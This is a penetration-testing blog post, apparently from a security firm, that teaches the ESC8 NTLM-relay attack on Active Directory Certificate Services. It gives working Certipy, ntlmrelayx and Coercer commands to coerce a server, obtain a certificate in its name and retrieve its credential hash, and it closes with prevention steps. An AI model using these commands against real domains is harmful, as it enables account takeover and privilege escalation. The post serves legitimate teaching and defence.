Abusing Active Directory Certificate Services (Part 3)

In PART ONE and PART TWO of this blog series, we discussed common misconfigurations of Active Directory certificate templates. In this post, we will walk through exploitation of the Web Enrollment feature. Active Directory Certificate Services (ADCS) supports HTTP-based enrollment methods. If enabled, HTTP-based certificate enrollment interfaces can be vulnerable to NTLM relay attacks. If an attacker can coerce a victim account to authenticate to the attacker-controlled machine, the credential material can be relayed to the Certificate Authority to request a certificate on behalf of the victim. 

In some cases, a relay attack may not even require domain credentials. For example, if the victim host is not patched against CVE-2021-369421, an attacker on the network could trick the victim machine to authenticate to the attacker host by abusing the vulnerable API method OpenEncryptedFileRaw through LSARPC (Local System Authority Remote Protocol) interface. 

This blog post will not discuss relay attacks in detail; however, BHIS has many resources for red and blue teams alike on relay attacks, which can be found in the “Resources” section towards the end of this article. 

ESC8

In the following example, let’s imagine that we have gained a foothold in our target company FOOBAR’s internal network and have compromised the account of a user with the name “billy.” We want to enumerate the ADCS configuration for the internal target domain “foobar.com.” 

To enumerate ADCS configurations with Certipy2, use the find command and use the -enabled flag to specifically print out templates that are enabled. 

The full Certipy command is shown below: 

certipy find \ 
  -u '[email protected]' \ 
  -p <PASSWORD> \ 
  -dc-ip <DC_IP> \ 
  -enabled 

Certipy outputs the enumeration results of interest in JSON (JavaScript Object Notation) and TXT files following the naming convention “<DATE-TIMESTAMP>_Certipy” as shown in the figure below.  

ADCS Enumeration 

Note that the ESC8 technique does not abuse certificate template misconfigurations. Instead, this technique leverages the configuration of the Certificate Authority (CA) server.  

Active Directory Certificate Authorities that are vulnerable to ESC8 meet the following conditions: 

  • Web Enrollment: Enabled 
  • Request Disposition: Issue 
Vulnerable Certificate Authority 

As shown in the figure above, foobar-CA is vulnerable to ESC8, which means, if we can coerce a domain account to authenticate to our machine, we can relay the victim’s credential material to the CA to obtain a certificate on behalf of that victim.  

The template specified in the relay attack must be a template that the victim account has permission to enroll in. For instance, a common NTLM relay technique involves tricking a machine account to authenticate to the attacker-controlled host via abuse of Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC).  

In this example, we will coerce server01.foobar.com to authenticate to our machine (10.10.1.100) and request a certificate using the following enabled template. 

Domain Computers Template 

The attack path can be summarized as follows: 

  • Coerce the victim machine (server01.foobar.com) to authenticate to an attacker-controlled host. 
  • Relay the hash obtained from the victim to the ADCS HTTP endpoint http://<VULNERABLE_CA>/certsrv/certfnsh.asp. 
  • Request a certificate in the name of the coerced machine account. 
  • Authenticate with the obtained certificate to collect the NTLM hash of the victim machine. 

Step 1: Set Up Relay 

We can configure Certipy to relay the coerced credentials to the ADCS HTTP endpoint http://foobar-CA.foobar.com/certsrv/certfnsh.asp to request a certificate on behalf of server01.foobar.com using the following command.  

certipy relay \ 
  -ca foobar-CA.foobar.com \ 
  -template 'DomainComputers' 

If you do not specify a template name, Certipy will attempt to issue a certificate using the Machine and User templates. These are default templates, but that does not mean that they will be available in your target environment or that they apply to your victim account. 

*Side Note:* You could also use Impacket3 to relay the credential material to the target HTTP endpoint.  

The Impacket command for this is shown below. 

python3 ntlmrelayx.py \ 
  -t 'http://foobar-CA.foobar.com/certsrv/certfnsh.asp' \ 
  --adcs \ 
  --template 'DomainComputers' 

If you do not specify a template name, Ntlmrelayx will attempt to issue a certificate using the DomainController template. This is a default template, but it may not be available in your target environment. 

Step 2: Coerce Victim Machine & Request a Certificate for Victim 

There are several tools that can be used to conduct coercion attacks.  

  • Coercer: https://github.com/p0dalirius/Coercer 
  • https://github.com/bats3c/ADCSPwn 
  • PetitPotam: https://github.com/topotam/PetitPotam 

In this example, we will use Coercer, a Python tool that can be used to coerce Windows machines to authenticate to your machine by calling known vulnerable RPC (Remote Procedure Call) functions.  

coercer coerce \ 
  -t server01.foobar.com \ 
  -I 10.10.1.100 \ 
  -u '[email protected]' \ 
  -p <PASSWORD> \ 
  -d foobar.com 
Coerce Victim Machine 

The error outlined in the figure above, [+] (ERROR_BAD_NETPATH), is what I like to call, “the good error.” This result indicates that the coercion was successful. As shown in the figure above, Coercer tried to force server01 to authenticate using multiple methods RPC methods. The tool successfully forced the victim to authenticate using the EfsRpcDecryptFileSrv method. 

As shown in the figure below, the credential material was relayed through the Certipy relay that we set up earlier, to the target endpoint http://foobar-CA.foobar.com/certsrv/certfnsh.asp and a certificate was obtained for server01.  

Certipy Relay Server

**Troubleshooting Sidebar** 

If you find yourself in a situation where Certipy returns a certificate but the object does not have identification and you cannot authenticate using the resulting PFX like the example below — 

Certificate Obtained Without Identification 
Failed to Authenticate with Certificate 

You may need to use the -upn flag and specify the victim’s name. For example: 

certipy relay \ 
  -ca 'foobar-CA' \ 
  -template 'DomainController' \ 
  -target 'FOOBAR-CA.foobar.com' \ 
  -upn '[email protected]' 
Get Certificate for DC01$ 

**End Sidebar** 

Step 3: Impersonate Victim User 

Once we’ve successfully Coerced the target machine server01 and relayed the credentials to obtain a certificate on behalf of server01.foobar.com, we can use the certificate to obtain the credential hash and a Kerberos ticket of the target server01 account using the Certipy auth command as shown below: 

certipy auth -pfx server01.pfx 

We have successfully retrieved the hash for the server01 account and can impersonate server01! 

Get Server01 Credentials 

In summary, Certificate Authorities with web enrollment enabled are susceptible to NTLM relay attacks. In some cases, relay attacks can be performed without domain credentials. This issue could allow a user to escalate privileges in the target environment.  

Additional Things to Consider 

  • Try to coerce the domain controller (DC). I’ve had a lot of luck with this in the past. If you can coerce the domain controller, you can impersonate the DC and gain DCSync access to the target domain. 
  • When you obtain a certificate, Certipy will return the request ID or an Object SID. Take note of these values. You can use that information to revoke the certificate. 
  • A certificate is valid until the validity period ends unless the certificate is explicitly revoked. The validity period is determined by the template configuration. Using the example above, this means that we will have access to server01.foobar.com’s account for the next five years, regardless of any password changes.  

Prevention 

So, what can we do to prevent such attacks? Here are a few steps you can take: 

  1. Disable ADCS HTTP endpoints if they are not necessary 
  1. If possible, disable NTLM Authentication 
  1. Enforce HTTPS and enable Extended Protection for Authentication6 
  1. Enable requirements for SMB/LDAP signing 
  1. Enforce LDAP channel binding 

Resources 

BHIS Blogs:

  • https://www.blackhillsinfosec.com/admins-nightmare-combining-hivenightmare-serioussam-and-ad-cs-attack-paths-for-profit/ 
  • https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/ 
  • https://www.blackhillsinfosec.com/mitm6-strikes-again-the-dark-side-of-ipv6/ 
  • https://www.blackhillsinfosec.com/impacket-offense-basics-with-an-azure-lab/ 
  • https://www.blackhillsinfosec.com/impacket-defense-basics-with-an-azure-lab/ 
  • https://www.blackhillsinfosec.com/a-pentesters-voyage-the-first-few-hours/ 

BHIS Webcasts:

  • https://www.blackhillsinfosec.com/event/bhis-webcast-coercions-and-relays-the-first-cred-is-the-deepest-with-gabriel-prudhomme/ 
  • https://www.blackhillsinfosec.com/webcast-attack-tactics-5-zero-to-hero-attack/ 

Additional Resources: 

  • [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942 
  • [2] https://github.com/ly4k/Certipy 
  • [3] https://github.com/fortra/impacket
  • https://posts.specterops.io/certified-pre-owned-d95910965cd2 
  • https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf 
  • https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429 
  • https://social.technet.microsoft.com/wiki/contents/articles/10942.ad-cs-security-guidance.aspx 
  • https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786443%28v=ws.11%29 
  • https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash 
  • https://www.securew2.com/blog/how-to-revoke-certificate-in-windows-ad-cs  
  • https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 
  • https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1 
  • https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979 
  • https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b 
  • https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f 

READ:



Ready to learn more?

Level up your skills with affordable classes from Antisyphon!

Pay-What-You-Can Training

Available live/virtual and on-demand